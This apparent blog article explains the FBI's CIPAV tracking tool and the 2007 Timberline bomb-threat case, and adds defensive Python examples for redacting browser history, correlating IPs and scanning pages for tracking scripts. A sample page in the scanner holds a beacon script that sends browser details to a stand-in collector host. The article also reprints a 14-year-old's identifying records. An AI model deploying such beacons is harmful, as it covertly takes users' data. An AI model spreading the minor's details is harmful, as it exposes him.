CIPAV (Computer and Internet Protocol Address Verifier)
Abstract
1984 is a tad late in coming. Ah no, nah it isn't. This was just a commentary in some random online news. I just want to let you know what I know about CIPAV. CIPAV stands for Computer and Internet Protocol Address Verifier, a software tool developed by the FBI. It has been described as a "secret data-gathering tool that the FBI uses to track and gather location data on suspects under electronic surveillance". I want to cover CIPAV in my articles because I did some research on government investigation software. I want to explain what is known about CIPAV and how it most likely works. Enjoy reading!
- Peter Kleissner, Investigator
CIPAV
CIPAV (Computer and Internet Protocol Address Verifier) is a software program developed by the FBI that, put simply, finds out the IP address of a suspect who is using and spoofing electronic communication. This is necessary for the FBI to investigate electronic communication across U.S. borders and is "useful" when someone uses proxies and tunneling to hide or anonymize their true origin on the internet.
As described in the affidavit (link below), CIPAV collects the following data:
- IP address
- MAC address
- Registry keys
- Environment variables
- Open ports
- Process list
- Operating system (type, version, serial number/product ID)
- Internet browser and version
- Language identifier
- Computer name, company name
- User name
- Browser history of visited sites
Half of the collected data can be used to uniquely tie a computer to a person; the other half is what you would want if you intended to break into the target computer. The IP address, MAC address, certain registry keys and the computer name, among other things, can be used to assign a computer to a real person, while open ports, the process list or the internet browser version are clearly there to find security flaws in the computer's configuration.
Today you would use that half of the information to find security flaws in the computer's configuration and then use Metasploit or another exploitation framework to gain access to and control of the computer. The operating system product ID has already been used multiple times to identify the buyer of a computer: the whole process of selling a Windows OS is logged via the product ID (where it was sold, where it was shipped, to whom, etc.). The browser history that is collected is clearly an intrusion into privacy and has nothing to do with configuration. It must be treated as content, not as metadata/configuration, and therefore collecting it without an explicit search warrant is illegal. URLs often contain sensitive information, like filled-out form contents, login information or session IDs.
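To make the last point concrete, here is an added example (my own code, not something from the affidavit or from CIPAV) that audits a browser history for URLs whose query parameters look like credentials, session identifiers or account numbers, and produces a redacted copy of each URL. The history entries and the parameter-name patterns are constructed assumptions for the demonstration; any real audit would tune the pattern list to the sites in question.

```python
import re
from urllib.parse import urlsplit, parse_qsl, urlencode

# Constructed sample browser history (not from the affidavit or any real system).
SAMPLE_HISTORY = [
    "https://mail.example.test/inbox?sid=9f3a2c7e1b&folder=inbox",
    "https://shop.example.test/search?q=pressure+cooker",
    "https://forum.example.test/login?user=alice&password=hunter2",
    "https://news.example.test/article/42",
    "https://bank.example.test/statement?token=eyJhbGciOi&acct=12345678",
]

# Assumed parameter-name fragments that usually carry content rather than configuration.
SENSITIVE_KEYS = re.compile(r"(sess|sid|token|auth|passw|pwd|user|login|acct|email)", re.I)


def classify_url(url):
    """Split a URL and report which query parameters look sensitive."""
    parts = urlsplit(url)
    params = parse_qsl(parts.query, keep_blank_values=True)
    sensitive = [k for k, _ in params if SENSITIVE_KEYS.search(k)]
    return {
        "host": parts.hostname,
        "path": parts.path,
        "param_count": len(params),
        "sensitive_params": sensitive,
    }


def redact_url(url):
    """Return the URL with the values of sensitive parameters replaced by REDACTED."""
    parts = urlsplit(url)
    params = parse_qsl(parts.query, keep_blank_values=True)
    kept = [(k, "REDACTED" if SENSITIVE_KEYS.search(k) else v) for k, v in params]
    return parts._replace(query=urlencode(kept)).geturl()


def audit_history(urls):
    """Return (url, sensitive_parameter_names) for every URL that leaks content in its query."""
    findings = []
    for u in urls:
        info = classify_url(u)
        if info["sensitive_params"]:
            findings.append((u, info["sensitive_params"]))
    return findings


if __name__ == "__main__":
    for url, keys in audit_history(SAMPLE_HISTORY):
        print(f"{', '.join(keys):20s} {redact_url(url)}")
```

Three of the five constructed entries are flagged; the redacted form is what a privacy-preserving collection of "configuration" data would have to keep at most, which shows how far a raw history list goes beyond that.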
Timberlinebombinfo Case
Before explaining how CIPAV works, I want to give some details about the actual case in which CIPAV was used to identify a suspect. In summer 2007, a student at Thurston County School sent bomb threats via email to his school. He also still has an account at MySpace, www.myspace.com/timberlinebombinfo, with a picture of bombs on it. His last login was 22.06.2007, the end of the month in which he sent multiple bomb threats to his school.
Anyway, he used a proxy server in Italy to hide his true IP address. He registered email accounts with Google and sent bomb threats to his school. He used a compromised computer in Italy to tunnel his communication (most likely a SOCKS5 server), not a difficult thing to do. A lot of script-kiddie tools like the Shark trojan have such functionality integrated: a victim automatically acts as a proxy. All you have to do is spread your trojan (a simple executable) into the world.
Google's Open
By giving information to the FBI. See the following data that Google collected about the suspect via its Google Mail service (taken from the affidavit):
Status: Enabled (user deleted account)
Services: Talk, Search History, Gmail
Name: Doug Briggs
Secondary Email:
Lang: en
IP: 80.76.80.103
LOGS: All Times are displayed in UTC/GMT
dougbriggs123@gmail.com
Date/Time IP
04-Jun-2007 05:47:29 am 81.27.207.243
04-Jun-2007 05:43:14 am 80.76.80.103
03-Jun-2007 06:19:44 am 80.76.80.103
This is what Google saves about you, even if you delete your Google Mail account. All IP addresses (the one used when registering and all others used for login) are recorded.
MySpace too
MySpace stores the following information:
User ID: 199219316
First Name: Doug
Last Name: Briggs
Gender: Male
Date of Birth: 12/10/1992
Age: 14
Country: US
City: Lacey
Postal Code: 985003
Region: Western Australia
Email Address: timberline.sucks@gmail.com
User Name: timberlinebombinfo
Sign up IP Address: 80.76.80.103
Sign up Date: June 7, 2007 7:49 PM
Delete Date: N/A
Login Date: June 7, 2007 7:49:32:247 PM
IP Address: 80.76.80.103
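What makes the two records above useful to an investigator is that the same address (80.76.80.103, the Italian proxy) appears in both services' logs, so the accounts can be linked before anything is known about the real machine. The following added example (my own code, not from the affidavit or from any FBI tool) shows that correlation step over constructed records written in the same "Key: Value" and log-line style; the names, dates and addresses are made up, and the IP addresses are RFC 5737 documentation ranges rather than the real ones.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed sample records in the style of the affidavit data above.
# All values are illustrative; the addresses come from the RFC 5737 TEST-NET ranges.
GMAIL_RECORD = """\
Name: Example User
Lang: en
IP: 198.51.100.7
LOGS: All Times are displayed in UTC/GMT
04-Jun-2007 05:47:29 am 203.0.113.9
04-Jun-2007 05:43:14 am 198.51.100.7
03-Jun-2007 06:19:44 am 198.51.100.7
"""

MYSPACE_RECORD = """\
User ID: 100000001
User Name: example_account
Sign up IP Address: 198.51.100.7
Sign up Date: June 7, 2007 7:49 PM
Login Date: June 7, 2007 7:49:32:247 PM
IP Address: 198.51.100.7
"""

# Dotted-quad candidates; each one is then validated with the ipaddress module so
# that timestamps such as 7:49:32:247 or numeric IDs never slip through.
IPV4_CANDIDATE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def extract_ips(record):
    """Return the set of valid IPv4 addresses appearing anywhere in a record."""
    found = set()
    for candidate in IPV4_CANDIDATE.findall(record):
        try:
            found.add(str(ipaddress.IPv4Address(candidate)))
        except ipaddress.AddressValueError:
            continue
    return found


def correlate(records):
    """records maps service name -> record text. Returns {ip: sorted list of services}."""
    seen = defaultdict(set)
    for service, text in records.items():
        for ip in extract_ips(text):
            seen[ip].add(service)
    return {ip: sorted(services) for ip, services in seen.items()}


def shared_ips(records):
    """Addresses that appear in the records of more than one service."""
    return sorted(ip for ip, services in correlate(records).items() if len(services) > 1)


if __name__ == "__main__":
    records = {"gmail": GMAIL_RECORD, "myspace": MYSPACE_RECORD}
    for ip, services in sorted(correlate(records).items()):
        print(f"{ip:16s} {', '.join(services)}")
    print("shared:", shared_ips(records))
```

On the constructed data, 198.51.100.7 is the only address common to both services, exactly the situation in the case: the shared address points at the proxy, not at the suspect, which is why the FBI still needed CIPAV to get past it.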
How CIPAV works
CIPAV is a framework of PHP, JavaScript and Browser Helper Object/ActiveX code, much like today's non-public advertisement information-capture tools. Advertising companies put JavaScript or Flash on a site (the banners you see, etc.) to execute script code on a target machine. This script code then gathers local data and sends it to a server. CIPAV works in exactly the same way: a script in the web browser is executed locally and the local data is sent to a remote server. A browser helper object is used to gather a) additional and b) instant data, like the registry values mentioned before or environment variables.
The idea is quite simple: the code comes within a website and is executed locally. This solves all problems with proxies for investigators: if you can see the website, you have the malicious code. In the timberlinebombinfo case it was the MySpace site, and its administrators hosted the CIPAV program on MySpace to obtain the data presented above. The final idea behind the concept is that the executed code contacts the (law enforcement) server and sends data like the IP address and the local configuration. The Browser Helper Object/ActiveX component can be installed automatically into the browser, so every time the suspect uses Internet Explorer the browser helper object becomes active and can do its intelligence job.
So no, there is no executable sent via email; this is simply not done, not true and not the case (many people speculated that CIPAV could arrive via email or via a security flaw in Windows).
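The mechanism described above, a page script that reads browser properties and ships them to a collector host, leaves a recognisable footprint in the page source, and that is what a user or site operator auditing a page would look for. Here is an added example (my own code, not the page's and not CIPAV's) that scans inline and external scripts in an HTML document for the combination of data collection (navigator, screen, cookie, referrer reads) and an outbound send (XMLHttpRequest, fetch, sendBeacon, image or script source), and reports any third-party hosts involved. The sample page, its hosts and the pattern lists are constructed assumptions for the demonstration.

```python
import re
from urllib.parse import urlsplit

# Constructed sample page: one harmless UI script, one beacon, one first-party
# external script and one third-party external script. Hosts are made up.
SAMPLE_PAGE_HOST = "profile.example.test"
SAMPLE_HTML = """
<html><body>
<script>
  // harmless: toggles a menu, touches nothing outside the page
  document.getElementById('menu').style.display = 'block';
</script>
<script>
  var d = navigator.userAgent + '|' + navigator.language + '|' + screen.width;
  new Image().src = 'http://collector.example.test/log?d=' + encodeURIComponent(d);
</script>
<script src="http://profile.example.test/static/app.js"></script>
<script src="http://ads.example.test/track.js"></script>
</body></html>
"""

SCRIPT_BLOCK = re.compile(r"<script\b[^>]*>(.*?)</script>", re.S | re.I)
SCRIPT_SRC = re.compile(r"<script\b[^>]*\bsrc\s*=\s*[\"']([^\"']+)[\"']", re.I)
# Assumed indicators: reads of client-side properties, and ways to send data out.
COLLECTORS = re.compile(r"\b(navigator\.\w+|screen\.\w+|document\.cookie|document\.referrer)")
SENDERS = re.compile(r"(XMLHttpRequest|fetch\s*\(|sendBeacon|new\s+Image\s*\(|\.src\s*=)")
URLS = re.compile(r"https?://[^\s'\"<>]+")


def scan_inline_scripts(html, page_host):
    """Flag inline scripts that both read client properties and send something out."""
    findings = []
    for index, body in enumerate(SCRIPT_BLOCK.findall(html)):
        collects = sorted(set(COLLECTORS.findall(body)))
        sends = SENDERS.search(body) is not None
        hosts = {urlsplit(u).hostname for u in URLS.findall(body)}
        third_party = sorted(h for h in hosts if h and h != page_host)
        if collects and sends:
            findings.append({
                "script_index": index,
                "collects": collects,
                "third_party_hosts": third_party,
            })
    return findings


def external_script_hosts(html, page_host):
    """Hosts other than the page's own that serve <script src=...> code."""
    hosts = {urlsplit(u).hostname for u in SCRIPT_SRC.findall(html)}
    return sorted(h for h in hosts if h and h != page_host)


if __name__ == "__main__":
    for f in scan_inline_scripts(SAMPLE_HTML, SAMPLE_PAGE_HOST):
        print(f"inline script #{f['script_index']}: reads {f['collects']}, "
              f"sends to {f['third_party_hosts'] or ['same host']}")
    print("external script hosts:", external_script_hosts(SAMPLE_HTML, SAMPLE_PAGE_HOST))
```

The scanner is deliberately a static heuristic: it will miss obfuscated code and code loaded at runtime, which is why the external-host list matters as much as the inline findings. Note also that the collection side of this pattern is indistinguishable from ordinary advertising scripts, as the article says; what separates them is only who runs the collector host.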
References
- Affidavit for Search Warrant, United States District Court
- Search Warrant, United States District Court
- FBI remotely installs spyware to trace bomb threat
- FBI's Secret Spyware Tracks Down Teen Who Made Bomb Threats, Wired news
Last modified: 21 March 2009
